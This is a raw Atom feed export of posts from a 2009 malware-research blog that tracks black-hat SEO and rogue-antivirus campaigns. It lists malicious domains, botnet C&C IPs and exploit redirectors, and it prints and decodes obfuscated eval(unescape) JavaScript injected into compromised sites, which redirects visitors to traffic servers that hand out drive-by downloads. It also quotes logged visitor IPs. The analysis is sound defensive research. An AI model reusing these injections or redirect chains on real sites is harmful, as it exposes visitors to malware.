href="http://wepawet.cs.ucsb.edu/view.php?hash=40131580bd98592c013be3d33aa926b1&amp;amp;t=1239959058&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=19d052d8429d68d3409883523bde4b33d" target="_blank"&gt;Anubis&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;Botnet C&amp;amp;C: 78.109.29.112&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mainnameshop.cn&lt;/td&gt;&lt;td&gt;Redirect to exploits sdfi.hostindianet.com/index.php (dead)&lt;br /&gt;  &lt;br /&gt;  Detection: Win32/Bredolab.B&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mediahomenamemartvideo.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C down (TS v3.2)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://mediahousenameshopfilm.cn&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="192"&gt;hxxp://nameashop.cn/in.cgi?income&lt;/td&gt;&lt;td&gt;On 2009-03-21 01:40:07 - &lt;a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&amp;amp;t=1237624807&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  Redirect to exploit on &lt;br /&gt;hxxp://sadcwed.hostindianet.com/index.php&lt;br /&gt;  On 2009-04-05 13:22:58 - &lt;a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&amp;amp;t=1238962978&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  Redirect to exploit on   &lt;br /&gt;  freeonlinehostguide.com/index.php &lt;br /&gt;  &lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=5802a3beabd9368daf35ad1eb4a995b3&amp;amp;t=1238099033"&gt;Analysis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe" target="_blank"&gt;VirusTotal &lt;/a&gt;- &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  Detection:  Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen&lt;br /&gt;  It connect to a botnet and drop the file &amp;quot;digiwet.dll&amp;quot;&lt;br /&gt;  Botnets:  &lt;br /&gt;  turokgame.cn [74.50.98.156]&lt;br /&gt;  94.247.2.95 and 78.109.30.224&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="23"&gt;hxxp://namebrandmart.cn/in.cgi&lt;br /&gt;?income18&lt;/td&gt;&lt;td&gt;litehitscar.cn/load.php &lt;a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&amp;amp;t=1239055570&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="24"&gt;hxxp://namebuyline.cn&lt;/td&gt;&lt;td&gt; &lt;a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&amp;amp;t=1239055570&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="76"&gt;hxxp://namebuypicture.cn/&lt;br /&gt;in.cgi?income31&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / redirect to exploit&lt;br /&gt;  hyperliteautoservices.cn/index.php (dead)&lt;br /&gt;   but the trojan is still available on&lt;br /&gt;  hyperliteautoservices.cn/load.php &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=a4d97828eb9521d905394f4a6d7516df&amp;amp;t=1239246607&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="24"&gt;hxxp://namesupermart.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="79"&gt;hxxp://namestorefilmlife.cn/&lt;br /&gt;  in.cgi?income&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Exploits to litehitscar.cn&lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&amp;amp;t=1239080309&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;  &lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;br /&gt;  &lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="93"&gt;hxxp://perfectnamestore.cn&lt;br /&gt;    /in.cgi?income8&lt;/td&gt;&lt;td&gt;Redirect to exploit&lt;br /&gt;  hyperliteautoservices.cn/index.php (dead)&lt;br /&gt;  but the trojan is still available on&lt;br /&gt;  hyperliteautoservices.cn/load.php &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;  [94.247.3.151]&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://playbetwager.cn/in.cgi?income&lt;/td&gt;&lt;td&gt;&lt;br /&gt;  freeonlinehostguide.com/index.php&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://superbetfair.cn/in.cgi?income&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C / Exploits to litehitscar.cn&lt;br /&gt;  &lt;a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&amp;amp;t=1239080309&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;br /&gt;  then load trojan located&lt;br /&gt;  hyperliteautoservices.cn/load.php?id=4&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747"&gt;VirusTotal&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://wepawet.iseclab.org/view.php?hash=9bad5a6b522a3a1a37b6a62572a83767&amp;amp;t=1239297891&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt;&lt;br /&gt;Detection: Trojan.Botnetlog.3 &lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://thelotbet.cn&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;hxxp://yourfilmmovie.cn&lt;/td&gt;&lt;td&gt;Botnet C&amp;amp;C&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;hxxpp//freeonlinehostguide.com/index.php &lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=5802a3beabd9368daf35ad1eb4a995b3&amp;amp;t=1238099033"&gt;Analysis&lt;/a&gt;&lt;hr /&gt;&lt;p&gt;Dns&lt;br /&gt;&lt;br /&gt;AS48856&lt;br /&gt;VENTREX-AS Ventrex LLP&lt;/p&gt;&lt;p&gt;95.129.144.210&lt;/p&gt;&lt;p&gt;freednshostway.com&lt;br /&gt;ns1.bigtopescorts.cn&lt;br /&gt;ns1.casinobigtop.cn&lt;br /&gt;ns1.casinoslotbet.cn&lt;br /&gt;ns1.cheapslotplay.cn&lt;br /&gt;ns1.daddybigtop.cn&lt;br /&gt;ns1.educationbigtop.cn&lt;br /&gt;ns1.freednshostway.com&lt;br /&gt;ns1.freehostinternet.com&lt;br /&gt;ns1.freeonlinehostguide.com&lt;br /&gt;ns1.freewebhostguide.com&lt;br /&gt;ns1.greatbethere.cn&lt;br /&gt;ns1.hostindianet.com&lt;br /&gt;ns1.hyperliteautoservices.cn&lt;br /&gt;ns1.lieliteautobody.cn&lt;br /&gt;ns1.liteautofinestsite.cn&lt;br /&gt;ns1.liteautorepair.cn&lt;br /&gt;ns1.litehitscar.cn&lt;br /&gt;ns1.lotante.cn&lt;br /&gt;ns1.lotbetsite.cn&lt;br /&gt;ns1.playbetwager.cn&lt;/p&gt;&lt;p&gt;AS34187&lt;br /&gt;RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine&lt;/p&gt;&lt;p&gt;78.26.179.79&lt;/p&gt;&lt;p&gt;ns2.bigtopescorts.cn&lt;br /&gt;ns2.casinobigtop.cn&lt;br /&gt;ns2.casinoslotbet.cn&lt;br /&gt;ns2.cheapslotplay.cn&lt;br /&gt;ns2.daddybigtop.cn&lt;br /&gt;ns2.educationbigtop.cn&lt;br /&gt;ns2.freednshostway.com&lt;br /&gt;ns2.freehostinternet.com&lt;br /&gt;ns2.freeonlinehostguide.com &lt;br /&gt;ns2.freewebhostguide.com&lt;br /&gt;ns2.greatbethere.cn&lt;br /&gt;ns2.hostindianet.com &lt;br /&gt;ns2.hyperliteautoservices.cn&lt;br /&gt;ns2.lieliteautobody.cn&lt;br /&gt;ns2.liteautofinestsite.cn &lt;br /&gt;ns2.liteautorepair.cn&lt;br /&gt;ns2.litehitscar.cn &lt;br /&gt;ns2.lotante.cn &lt;br /&gt;ns2.lotbetsite.cn&lt;br /&gt;ns2.playbetwager.cn&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5389667171127975373?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5389667171127975373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5389667171127975373'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p1.html' title='Black Hat SEO - RBN Hacks, p.1'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-1794551099537672244</id><published>2009-04-07T06:19:00.000-07:00</published><updated>2009-04-09T14:31:07.836-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO and Rogue Antivirus p.7</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO - Rogue Antivirus is BIG Business&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  Inside the malicious traffic&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="510" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="510"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt; The Finjan's Malicious Code Research Center  has made a nice report &lt;br /&gt; about the business with rogue antivirus software &lt;br /&gt;(redirecting visitors from legitimate Web sites). &lt;a href="http://news.cnet.com/8301-1009_3-10200104-83.html" target="_blank"&gt;Zdnet Article&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The article can be found in the latest &lt;a href="http://www.finjan.com/cybercrime_intelligence" target="_blank"&gt;Cybercrime Intelligence Report&lt;/a&gt;&lt;br /&gt;&lt;hr /&gt;I just want to show you some script added on legit websites and the log &lt;br /&gt;we've found on the criminal web server.&lt;br /&gt;&lt;br /&gt;Note that for each site on this blog like goscanfuse.com, scan6lite.com, &lt;br /&gt;scan7new.com, every domain is listed in the Google API &amp;quot;Safe Browsing&amp;quot; &lt;br /&gt;and each of them reveal a lot of information. &lt;br /&gt; eg. the number on domain used (compromised) and other  in conjunctions.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;We start by a Google Safe Browsing Diagnostic for: scanline6.com&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.google.com/safebrowsing/diagnostic?site=http://scanline6.com/nag/1/&amp;amp;hl=en" target="_blank"&gt;Report here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;    Screenshot below (if the report is updated)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5nJD5hI/AAAAAAAAAYQ/Co0qXNZG2t8/s1600-h/AS21788NOC.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5nJD5hI/AAAAAAAAAYQ/Co0qXNZG2t8/s320/AS21788NOC.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938534381381138" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;    Now the Google Safe Browsing Diagnostic for three compromised websites&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5bmAssI/AAAAAAAAAYI/avWu9vntzLQ/s1600-h/scanline6.comSafeBrowsing.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 199px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5bmAssI/AAAAAAAAAYI/avWu9vntzLQ/s320/scanline6.comSafeBrowsing.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938531281580738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="280" height="48" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="276" height="46" style="padding:15px"&gt;alfredomcmillanji.awardspace.info&lt;br /&gt;  members.lycos.co.uk/cvhkc8xhv/&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Malicious script inserted. (after the body)&lt;br /&gt;&lt;br /&gt;&lt;table width="511" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="507" height="61" style="padding:15px"&gt;&amp;lt;script&amp;gt;&lt;br /&gt;eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\&lt;br /&gt;%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F&lt;br /&gt;\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\&lt;br /&gt;%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\&lt;br /&gt;%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\&lt;br /&gt;%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\&lt;br /&gt;%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B'))&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Which force the browser to be redirected to a traffic management server&lt;br /&gt;&lt;/p&gt;&lt;table width="372" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="368" height="61" style="padding:15px"&gt;document.location=&amp;quot;http://onlyfind.net/in.cgi?3&amp;amp;group=11&amp;amp;&lt;br /&gt;parameter=orthopedic+physical+examination&amp;quot;;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&amp;amp;t=1239107498&amp;amp;type=js" target="_blank"&gt;Result here&lt;/a&gt;&lt;br /&gt;  then redirect to a domain (drive-by-download)  which chose the next redirection&lt;br /&gt;&lt;/p&gt;&lt;table width="339" height="48" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="335" height="46" style="padding:15px"&gt;onlyfind.net to &amp;quot;goscandata.com&amp;quot; to &amp;quot;scanany6.com&amp;quot;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Note: the domain  (drive-by-download) redirect to a new site every day.&lt;br /&gt; &lt;br /&gt;On April 6: scanany6.com - &lt;a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&amp;amp;t=1239107498&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt;&lt;br /&gt;On April 7:  scan7live.com  - &lt;a href="http://wepawet.iseclab.org/view.php?hash=6277c30fcb40c1550e3b48cc6033b661&amp;amp;t=1239259541&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt;&lt;br /&gt;On April 8:  google.com &lt;br /&gt; On April 9: lite6scan.com - &lt;a href="http://wepawet.iseclab.org/view.php?hash=75b212b2737a3f1567a109552ef9358a&amp;amp;t=1239312379&amp;amp;type=js" target="_blank"&gt;Redirection Analysis &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr  /&gt; &lt;/p&gt;&lt;br /&gt;Let's show the second domain:&lt;br /&gt;&lt;br /&gt;&lt;table width="202" height="48" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="198" height="46" style="padding:15px"&gt;home.no/kjveubjh/&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Malicious script inserted. (after the body)&lt;br /&gt;&lt;br /&gt;&lt;table width="490" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="486" height="61" style="padding:15px"&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;&lt;br /&gt;eval(unescape('%70%61%72%65%6E%74%&lt;br /&gt;2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%&lt;br /&gt;2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%&lt;br /&gt;2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%&lt;br /&gt;67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%&lt;br /&gt;72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%&lt;br /&gt;63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%&lt;br /&gt;6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%&lt;br /&gt;6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%&lt;br /&gt;74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%&lt;br /&gt;72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%&lt;br /&gt;74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%&lt;br /&gt;77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%&lt;br /&gt;3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%&lt;br /&gt;45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%&lt;br /&gt;52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%&lt;br /&gt;6D%65%6E%74%2E%55%52%4C%29%29'))&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;then force the browser to be redirected to another traffic management server&lt;br /&gt;&lt;/p&gt;&lt;table width="409" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="405" height="61" style="padding:15px"&gt;parent.window.location.replace(&amp;quot;http://ddors.info/in.cgi?11&amp;amp;keyword=&lt;br /&gt;garageband+hard+rock+guitar+apple+loops&amp;amp;seoref=&amp;quot;&lt;br /&gt;+encodeURIComponent(document.referrer)+&amp;quot;&amp;amp;&amp;quot;+&lt;br /&gt;&amp;quot;parameter=$keyword&amp;amp;keyword=$keyword&amp;amp;se=$se&amp;amp;ur=1&lt;br /&gt;&amp;amp;HTTP_REFERER=&amp;quot;+encodeURIComponent(document.URL))&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=b5e1b4dfe085fdd8dd08aaddd70cac93&amp;amp;t=1239112269&amp;amp;type=js" target="_blank"&gt;Result here&lt;/a&gt;&lt;br /&gt;  then redirect to a domain (drive-by-download)  which chose the next redirection&lt;br /&gt;&lt;/p&gt;&lt;table width="423" height="48" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="419" height="46" style="padding:15px"&gt;ddors.info to &amp;quot;goscandata.com&amp;quot; to &amp;quot;scanany6.com&amp;quot;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Note that during the redirection the &amp;quot;traffic management server&amp;quot; is informed of your IP, &lt;br /&gt;the site which served for redirection &amp;quot;the compromised website&amp;quot;.&lt;br /&gt;&lt;br /&gt;  Interesting is that the site serving for the first redirection is  cited in &lt;a href="http://www.malwaredomainlist.com/mdl.php?search=ddors.info" target="_blank"&gt;Malware Domain List&lt;/a&gt; &lt;br /&gt;  since May 2008! for hosting a zlob variant. &lt;br /&gt;&lt;br /&gt;  *******&lt;br /&gt;&lt;br /&gt;  What we've found on the server is that:&lt;br /&gt;&lt;br /&gt;&lt;table width="426" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="422" height="61" style="padding:15px"&gt;1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%&lt;br /&gt;2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djour&lt;br /&gt;nal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%&lt;br /&gt;2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+&lt;br /&gt;Windows+NT+5%2E2%3B1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244&lt;br /&gt;http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml&lt;br /&gt;wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+&lt;br /&gt;MSIE+7%2E0%3B+Windows+NT+5%2E1%3B1 1 0 0 1 1 1 0 US &lt;br /&gt;en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%&lt;br /&gt;2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0&lt;br /&gt;+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;br /&gt;  The visitor IP (country), browser version/language  and the site you are coming from which is the compromised website.&lt;br /&gt;&lt;br /&gt;  I will not published the entire log because  a LOT of compromised web site is cited.&lt;br /&gt;  (We also have  logs from other server - in MB which include thousand of compromised website.) &lt;br /&gt;&lt;br /&gt;  This is some of them:&lt;br /&gt;&lt;/p&gt;&lt;table width="409" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="405" height="61" style="padding:15px"&gt;1 1 0 0 0 0 0 0 &lt;br /&gt;US en-us 65.55.165.94 &lt;br /&gt;hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2&lt;br /&gt;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;) &lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=7b65f635713daef7ab6d96a4b1b5252f&amp;amp;t=1239112857&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;1 1 0 0 1 1 1 0 &lt;br /&gt;GB en-gb 86.147.111.244&lt;br /&gt;hxxp://home.no/chuka/wicapeadea.html&lt;br /&gt;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=309ecbd6585d5312b71e000faff62ca0&amp;amp;t=1239115142&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;1 1 0 0 1 1 1 0 &lt;br /&gt;US en-us 72.11.87.126&lt;br /&gt;hxxp://titi.iax.be/aia-billing-form.html&lt;br /&gt;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=68f7e099e33a29e4512ea455e73bfaf7&amp;amp;t=1239114945&amp;amp;type=js" target="_blank"&gt;Redirection Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; 4 1 1 0 0 0 0 0 &lt;br /&gt;FR en-us 193.47.80.77&lt;br /&gt;hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html&lt;br /&gt;keyword for traffic: usda maps mn&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=c6c7901b91f89e3c7b0fce27acab32ac&amp;amp;t=1239114403&amp;amp;type=js" target="_blank"&gt;Redirection Analysis &lt;/a&gt;&lt;br /&gt;&lt;br /&gt; 4 1 1 0 0 0 0 0 US &lt;br /&gt; en-us 204.62.53.124&lt;br /&gt;hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html &lt;br /&gt;keyword for traffic: voodoo glow skulls guitar tabs &lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&amp;amp;t=1239114957&amp;amp;type=js" target="_blank"&gt;Redirection Analysis &lt;/a&gt; &lt;br /&gt;&lt;br /&gt; 4 1 0 0 0 0 0 0 IE &lt;br /&gt; en-us 78.137.163.133&lt;br /&gt; hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html &lt;br /&gt; keyword for traffic: remove hair dye stains &lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=c001a486d89b53856295b0ef12d59fd3&amp;amp;t=1239114967&amp;amp;type=js" target="_blank"&gt;Redirection Analysis &lt;/a&gt; &lt;br /&gt;&lt;br /&gt;4 1 0 0 1 1 1 0 US &lt;br /&gt;en-us 71.235.179.148 &lt;br /&gt;http://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html &lt;br /&gt;keyword for traffic: presentation tools for excel highlighting&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&amp;amp;t=1239114957&amp;amp;type=js" 